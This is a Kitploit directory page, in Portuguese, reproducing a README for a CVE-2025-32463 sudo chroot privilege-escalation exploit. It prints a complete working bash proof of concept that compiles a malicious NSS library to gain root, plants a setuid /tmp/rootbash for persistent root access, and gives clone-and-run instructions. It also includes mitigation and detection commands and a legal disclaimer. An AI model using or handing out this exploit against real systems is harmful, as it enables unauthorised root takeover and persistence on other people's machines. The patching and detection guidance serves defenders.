Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-32463 — Exploit de escalonamento local de privilégios para CVE-2025-32463, visando a falha de design do chroot do sudo. Fornece script de PoC, análise técnica e orientações de mitigação para as versões afetadas do sudo 1.9.14-1.9.17. | Kitploit
Ferramentas/GitHubGitHub/kaiht-ladiant/cve-2025-32463
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoExploração de Binários
GitHubkaiht-ladiant/cve-2025-32463

CVE-2025-32463

Exploit de escalonamento local de privilégios para CVE-2025-32463, visando a falha de design do chroot do sudo. Fornece script de PoC, análise técnica e orientações de mitigação para as versões afetadas do sudo 1.9.14-1.9.17.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
21há 1 anoAinda não revisado

CVE-2025-32463 - Exploração de Escalação de Privilégio do Chroot do Sudo

Visão Geral

CVE-2025-32463 é uma vulnerabilidade crítica de escalação de privilégios local nas versões 1.9.14 a 1.9.17 do sudo. Essa vulnerabilidade permite que atacantes com privilégios de sudo escalem para acesso root ao explorar uma falha de design na lógica de processamento da opção chroot.

Detalhes da Vulnerabilidade

  • ID do CVE: CVE-2025-32463
  • Versões Afetadas: sudo 1.9.14 - 1.9.17
  • Tipo de Vulnerabilidade: Escalação de Privilégios Local (LPE)
  • Severidade: Crítica
  • Versão Corrigida: sudo 1.9.17p1 e posteriores

Descrição Técnica

A vulnerabilidade ocorre devido a um problema de temporização no processo de validação de segurança do sudo. A função pivot_root é executada antes da verificação da política de segurança, permitindo que atacantes manipulem o ambiente do sistema de arquivos que o sudo utiliza para autenticação e autorização.

Fluxo de Ataque

  1. Manipulação do Ambiente: O atacante cria um ambiente chroot controlado com um nsswitch.conf malicioso
  2. Injeção de Biblioteca: Uma biblioteca NSS (Name Service Switch) maliciosa é colocada no ambiente controlado
  3. Escalação de Privilégio: O sudo carrega e executa a biblioteca maliciosa com privilégios de root
  4. Acesso Root: O atacante obtém acesso total ao shell root

Funções Afetadas

  • pivot_root: Executada cedo demais no processo
  • set_cmnd_path: Opera no ambiente manipulado
  • command_matches: Verificações de segurança contornadas devido à manipulação do ambiente

Pré-requisitos

Antes de usar este exploit, garanta que as seguintes condições sejam atendidas:

  • O sistema alvo executa a versão 1.9.14 - 1.9.17 do sudo
  • O usuário atual tem privilégios de sudo
  • A configuração do sudoers permite operações chroot
  • O compilador gcc está disponível no sistema alvo
  • Acesso de escrita aos diretórios temporários (ex.: /tmp)

Uso

Início Rápido

  1. Clone este repositório:
root@kitploit:~
git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463
  1. Torne o script executável:
root@kitploit:~
chmod +x cve-2025-32463.sh
  1. Execute o exploit:
root@kitploit:~
./cve-2025-32463.sh

Verificação Manual

Verifique se o sistema alvo é vulnerável:

root@kitploit:~
# Check sudo version
sudo --version

# Check sudo privileges
sudo -l

# Look for chroot-related permissions
sudo -l | grep chroot

Código do Exploit

O script principal do exploit (cve-2025-32463.sh):

root@kitploit:~
#!/bin/bash
# CVE-2025-32463 PoC - Sudo Chroot Privilege Escalation
# Based on research by Rich Mirch @ Stratascale Cyber Research Unit

STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > pentester.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>

void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  system("id > /tmp/pwned_proof.txt");
  system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
  execl("/bin/bash", "/bin/bash", NULL);
}
CEOF

mkdir -p pentest/etc libnss_
echo "passwd: /pentester" > pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/pentester.so.2 pentester.c

echo "[*] Exploiting CVE-2025-32463..."
echo "[*] Attempting privilege escalation..."
sudo -R pentest pentest

# Cleanup
rm -rf ${STAGE?}

Verificação

Após uma exploração bem-sucedida, verifique o acesso root:

root@kitploit:~
# Check current privileges
whoami

# Check proof file
cat /tmp/pwned_proof.txt

# Use setuid bash for persistent root access
/tmp/rootbash -p

Mitigação

Ações Imediatas

  1. Atualize o sudo para a versão 1.9.17p1 ou posterior:

    root@kitploit:~
    # Ubuntu/Debian
    sudo apt update && sudo apt upgrade sudo
    
    # CentOS/RHEL
    sudo yum update sudo
    
    # or
    sudo dnf update sudo
    
  2. Remova as diretivas chroot do sudoers (solução temporária):

    root@kitploit:~
    # Backup current configuration
    sudo cp /etc/sudoers /etc/sudoers.backup
    
    # Remove chroot-related entries
    sudo sed -i '/chroot/d' /etc/sudoers
    
    # Verify syntax
    sudo visudo -c
    

Detecção

Monitore tentativas de exploração:

root@kitploit:~
# Check for suspicious temporary directories
find /tmp -name "*.stage.*" -type d

# Monitor sudo logs
tail -f /var/log/auth.log | grep sudo

# Look for NSS library compilation
find /tmp -name "libnss_*.so*" -type f

Detalhes Técnicos

Análise da Causa Raiz

A vulnerabilidade origina-se de uma falha de design no fluxo de execução do sudo:

  1. Fluxo Normal Esperado:

    • Analisar entrada do usuário
    • Validar política do sudoers
    • Configurar ambiente (incluindo chroot)
    • Executar comando
  2. Fluxo Vulnerável Real:

    • Analisar entrada do usuário
    • Executar chroot (pivot_root) - O problema ocorre aqui
    • Validar política do sudoers (no ambiente manipulado)
    • Executar comando

Exploração da Biblioteca NSS

O exploit aproveita o sistema Name Service Switch (NSS):

  1. O sudo lê /etc/nsswitch.conf para autenticação do usuário
  2. No ambiente chroot, o atacante controla este arquivo
  3. A biblioteca NSS maliciosa é carregada com privilégios de root
  4. O construtor da biblioteca executa código arbitrário como root

Ambiente de Testes

Este exploit foi testado em:

  • Ubuntu 20.04/22.04 com sudo 1.9.15
  • Debian 11/12 com sudo 1.9.14-1.9.17
  • CentOS 8/9 com versões afetadas do sudo
  • Contêineres Docker com instalações vulneráveis do sudo

Referências

  • Aviso de segurança oficial do sudo
  • Pesquisa original de Rich Mirch
  • Análise do código-fonte do sudo

Aviso Legal

⚠️ AVISO LEGAL IMPORTANTE ⚠️

Esta ferramenta é fornecida apenas para fins educacionais e de testes autorizados.

  • Use apenas em sistemas que você possui ou para os quais tem permissão explícita para testar
  • O uso não autorizado deste exploit é ilegal e antiético
  • Os autores não são responsáveis por qualquer uso indevido ou dano
  • Sempre garanta que você tenha a devida autorização antes de realizar testes de segurança

Contribuindo

Contribuições são bem-vindas! Por favor:

  1. Faça um fork do repositório
  2. Crie um branch de funcionalidade
  3. Envie um pull request com uma descrição detalhada

Licença

Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.

Histórico de Alterações

v1.0.0

  • Lançamento inicial
  • Funcionalidade básica do exploit
  • Documentação abrangente

Nota: Esta vulnerabilidade afeta um componente crítico do sistema. Utilize com responsabilidade e garanta que todos os testes sejam autorizados.

Baixar ferramenta